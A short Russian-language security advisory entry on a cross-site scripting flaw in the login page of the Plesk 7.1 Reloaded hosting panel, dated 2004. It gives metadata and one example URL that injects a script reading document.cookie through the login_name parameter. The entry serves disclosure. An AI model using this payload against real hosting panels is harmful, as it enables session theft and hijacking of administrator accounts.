Межсайтовый скриптинг в Plesk 7.1

Дата публикации:25.08.2004
Всего просмотров:1146
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Plesk 7.1

Описание: Уязвимость обнаружена в Plesk 7 Reloaded. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

http://[target]/login_up.php3?login_n ame="><script>alert(document.cookie)</script><"&passwd=TheSur

URL производителя: http://www.sw-soft.com/en/products/plesk7reloaded/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: [Full-Disclosure] XSS in Plesk 7.1 Reloaded